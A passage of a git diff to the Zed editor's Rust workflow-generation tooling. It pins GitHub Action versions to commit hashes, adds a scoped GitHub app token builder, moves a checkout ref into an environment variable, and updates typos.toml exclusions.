"921e2c9f7148d7ba14cd819f417db338f63e733c", // nextest + ) } pub fn setup_cargo_config(platform: Platform) -> Step { @@ -223,17 +219,28 @@ pub fn clear_target_dir_if_large(platform: Platform) -> Step { } } -pub fn clippy(platform: Platform) -> Step { +pub fn clippy(platform: Platform, target: Option<&str>) -> Step { match platform { Platform::Windows => named::pwsh("./script/clippy.ps1"), - _ => named::bash("./script/clippy"), + _ => match target { + Some(target) => named::bash(format!("./script/clippy --target {target}")), + None => named::bash("./script/clippy"), + }, } } +pub fn install_rustup_target(target: &str) -> Step { + named::bash(format!("rustup target add {target}")) +} + pub fn cache_rust_dependencies_namespace() -> Step { - named::uses("namespacelabs", "nscloud-cache-action", "v1") - .add_with(("cache", "rust")) - .add_with(("path", "~/.rustup")) + 
named::uses( + "namespacelabs", + "nscloud-cache-action", + "a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9", // v1 + ) + .add_with(("cache", "rust")) + .add_with(("path", "~/.rustup")) } pub fn setup_sccache(platform: Platform) -> Step { @@ -247,6 +254,10 @@ pub fn setup_sccache(platform: Platform) -> Step { .add_env(("SCCACHE_BUCKET", SCCACHE_R2_BUCKET)) } +pub fn cargo_build_visual_tests() -> Step { + named::bash("cargo build -p zed --bin zed_visual_test_runner --features visual-tests") +} + pub fn show_sccache_stats(platform: Platform) -> Step { match platform { // Use $env:RUSTC_WRAPPER (absolute path) because GITHUB_PATH changes @@ -260,32 +271,36 @@ pub fn show_sccache_stats(platform: Platform) -> Step { } pub fn cache_nix_dependencies_namespace() -> Step { - named::uses("namespacelabs", "nscloud-cache-action", "v1").add_with(("cache", "nix")) + named::uses( + "namespacelabs", + "nscloud-cache-action", + "a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9", // v1 + ) + .add_with(("cache", "nix")) } pub fn cache_nix_store_macos() -> Step { // On macOS, `/nix` is on a read-only root filesystem so nscloud's `cache: nix` // cannot mount or symlink there. Instead we cache a user-writable directory and // use nix-store --import/--export in separate steps to transfer store paths. 
- named::uses("namespacelabs", "nscloud-cache-action", "v1").add_with(("path", "~/nix-cache")) + named::uses( + "namespacelabs", + "nscloud-cache-action", + "a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9", // v1 + ) + .add_with(("path", "~/nix-cache")) } pub fn setup_linux() -> Step { named::bash("./script/linux") } -fn install_mold() -> Step { - named::bash("./script/install-mold") -} - fn download_wasi_sdk() -> Step { named::bash("./script/download-wasi-sdk") } pub(crate) fn install_linux_dependencies(job: Job) -> Job { - job.add_step(setup_linux()) - .add_step(install_mold()) - .add_step(download_wasi_sdk()) + job.add_step(setup_linux()).add_step(download_wasi_sdk()) } pub fn script(name: &str) -> Step { @@ -498,20 +513,142 @@ pub mod named { } pub fn git_checkout(ref_name: &dyn std::fmt::Display) -> Step { - named::bash(&format!( - "git fetch origin {ref_name} && git checkout {ref_name}" - )) + named::bash(r#"git fetch origin "$REF_NAME" && git checkout "$REF_NAME""#) + .add_env(("REF_NAME", ref_name.to_string())) } -pub fn authenticate_as_zippy() -> (Step, StepOutput) { - let step = named::uses( - "actions", - "create-github-app-token", - "bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1", - ) - .add_with(("app-id", vars::ZED_ZIPPY_APP_ID)) - .add_with(("private-key", vars::ZED_ZIPPY_APP_PRIVATE_KEY)) - .id("get-app-token"); - let output = StepOutput::new(&step, "token"); - (step, output) +/// Non-exhaustive list of the permissions to be set for a GitHub app token. +/// +/// See https://github.com/actions/create-github-app-token?tab=readme-ov-file#permission-permission-name +/// and beyond for a full list of available permissions. 
+#[allow(unused)] +pub(crate) enum TokenPermissions { + Contents, + Issues, + PullRequests, + Workflows, +} + +impl TokenPermissions { + pub fn environment_name(&self) -> &'static str { + match self { + TokenPermissions::Contents => "permission-contents", + TokenPermissions::Issues => "permission-issues", + TokenPermissions::PullRequests => "permission-pull-requests", + TokenPermissions::Workflows => "permission-workflows", + } + } +} + +pub(crate) struct GenerateAppToken<'a> { + job_name: String, + app_id: &'a str, + app_secret: &'a str, + repository_target: Option, + permissions: Option>, +} + +impl<'a> GenerateAppToken<'a> { + pub fn for_repository(self, repository_target: RepositoryTarget) -> Self { + Self { + repository_target: Some(repository_target), + ..self + } + } + + pub fn with_permissions(self, permissions: impl Into>) -> Self { + Self { + permissions: Some(permissions.into()), + ..self + } + } +} + +impl<'a> From> for (Step, StepOutput) { + fn from(token: GenerateAppToken<'a>) -> Self { + let step = Step::new(token.job_name) + .uses( + "actions", + "create-github-app-token", + "f8d387b68d61c58ab83c6c016672934102569859", + ) + .id("generate-token") + .add_with( + Input::default() + .add("app-id", token.app_id) + .add("private-key", token.app_secret) + .when_some( + token.repository_target, + |input, + RepositoryTarget { + owner, + repositories, + }| { + input + .when_some(owner, |input, owner| input.add("owner", owner)) + .when_some(repositories, |input, repositories| { + input.add("repositories", repositories) + }) + }, + ) + .when_some(token.permissions, |input, permissions| { + permissions + .into_iter() + .fold(input, |input, (permission, level)| { + input.add( + permission.environment_name(), + serde_json::to_value(&level).unwrap_or_default(), + ) + }) + }), + ); + + let generated_token = StepOutput::new(&step, "token"); + (step, generated_token) + } +} + +pub(crate) struct RepositoryTarget { + owner: Option, + repositories: Option, +} + +impl 
RepositoryTarget { + pub fn new(owner: T, repositories: &[&str]) -> Self { + Self { + owner: Some(owner.to_string()), + repositories: Some(repositories.join("\n")), + } + } + + pub fn current() -> Self { + Self { + owner: None, + repositories: None, + } + } +} + +pub(crate) fn generate_token<'a>( + app_id_source: &'a str, + app_secret_source: &'a str, +) -> GenerateAppToken<'a> { + generate_token_with_job_name(app_id_source, app_secret_source) +} + +pub fn authenticate_as_zippy() -> GenerateAppToken<'static> { + generate_token_with_job_name(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY) +} + +fn generate_token_with_job_name<'a>( + app_id_source: &'a str, + app_secret_source: &'a str, +) -> GenerateAppToken<'a> { + GenerateAppToken { + job_name: function_name(1), + app_id: app_id_source, + app_secret: app_secret_source, + repository_target: None, + permissions: None, + } } diff --git a/tooling/xtask/src/tasks/workflows/vars.rs b/tooling/xtask/src/tasks/workflows/vars.rs index aa8fb0a4056a53807cd4b2f12f331cb9d4d0a235..b3f8bdf56e9bb0f93f81992fbc61dab2b9754e63 100644 --- a/tooling/xtask/src/tasks/workflows/vars.rs +++ b/tooling/xtask/src/tasks/workflows/vars.rs @@ -156,14 +156,31 @@ pub(crate) struct StepOutput { impl StepOutput { pub fn new(step: &Step, name: &'static str) -> Self { - Self { - name, - step_id: step - .value - .id - .clone() - .expect("Steps that produce outputs must have an ID"), - } + let step_id = step + .value + .id + .clone() + .expect("Steps that produce outputs must have an ID"); + + assert!( + step.value + .run + .as_ref() + .is_none_or(|run_command| run_command.contains(name)), + "Step Output name {name} must occur at least once in run command with ID {step_id}!" 
+ ); + + Self { name, step_id } + } + + pub fn new_unchecked(step: &Step, name: &'static str) -> Self { + let step_id = step + .value + .id + .clone() + .expect("Steps that produce outputs must have an ID"); + + Self { name, step_id } } pub fn expr(&self) -> String { diff --git a/typos.toml b/typos.toml index 6f76cc75d25add39d841c07bbde82f93514adac5..959b5fc6f73477369572cdca3ff95d12b43f5ee1 100644 --- a/typos.toml +++ b/typos.toml @@ -4,6 +4,9 @@ ignore-hidden = false extend-exclude = [ ".git/", + # Typewriter model names used for agent branch names aren't typos. + "crates/agent_ui/src/branch_names.rs", + # Contributor names aren't typos. ".mailmap", @@ -42,10 +45,10 @@ extend-exclude = [ "crates/gpui_windows/src/window.rs", # Some typos in the base mdBook CSS. "docs/theme/css/", + # Automatically generated JS. + "docs/theme/c15t@*.js", # Spellcheck triggers on `|Fixe[sd]|` regex part. "script/danger/dangerfile.ts", - # Eval examples for prompts and criteria - "crates/eval/src/examples/", # File type extensions are not typos "crates/zed/resources/windows/zed.iss", # typos-cli doesn't understand our `vˇariable` markup @@ -87,6 +90,10 @@ extend-ignore-re = [ # AMD GPU Services "ags", # AMD GPU Services - "AGS" + "AGS", + # "noet" is a vim variable (ideally to ignore locally) + "noet", + # Yarn Plug'n'Play + "PnP" ] check-filename = true

Some text strong link